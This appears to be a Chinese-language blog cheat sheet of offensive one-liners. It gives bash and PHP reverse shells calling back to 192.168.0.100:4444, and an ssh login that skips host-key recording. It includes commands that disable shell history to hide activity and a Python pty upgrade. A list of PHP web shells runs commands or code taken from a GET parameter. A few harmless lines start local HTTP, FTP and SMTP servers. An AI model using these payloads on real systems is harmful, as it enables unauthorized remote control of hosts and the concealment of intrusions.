One Line


Bash

# 反弹shell
bash -i >& /dev/tcp/192.168.0.100/4444 0>&1
# 不记录SSH公钥
ssh -o UserKnownHostsFile=/dev/null -T [email protected] /bin/bash –i
# 不记录历史命令
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0

Python

# 虚拟终端
python -c 'import pty; pty.spawn("/bin/bash")'
# HTTP服务器
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080
# FTP服务器
python -m pyftpdlib -u user -P passwd -p 21
# SMTP调试服务器
python -m smtpd -n -c DebuggingServer localhost:25

PHP

# 命令执行
<?php @system($_GET['cmd']); ?>
<?php @passthru($_GET['cmd']); ?>
<?php echo @exec($_GET['cmd']); ?>
<?php echo @shell_exec($_GET['cmd']); ?>
<?php @pcntl_exec('/bin/bash',array($_GET['cmd'])); ?>
# 代码执行
<?php @eval($_GET['cmd']); ?>
<?php @assert($_GET['cmd']) ?>
<?php @call_user_func($_GET['fun'],$_GET['cmd']); ?>
<?php $fun=@create_function('',$_GET['cmd']);$fun() ?>
<?php @array_map($_GET['fun'],array($_GET['cmd'])); ?>
# 反弹shell
php -r '$sock=fsockopen("192.168.0.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

文章作者: DongHuangT1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 DongHuangT1 !
评论
 上一篇
Git Clone Git Clone
由于天朝网络原因,导致Git Clone异常缓慢,因此需要我们另辟途径进行加速。
2020-02-04
下一篇 
Git Bash Git Bash
Git是一个开源的分布式版本控制系统,可以有效、高速地处理从很小到非常大的项目版本管理。
2020-02-03
  目录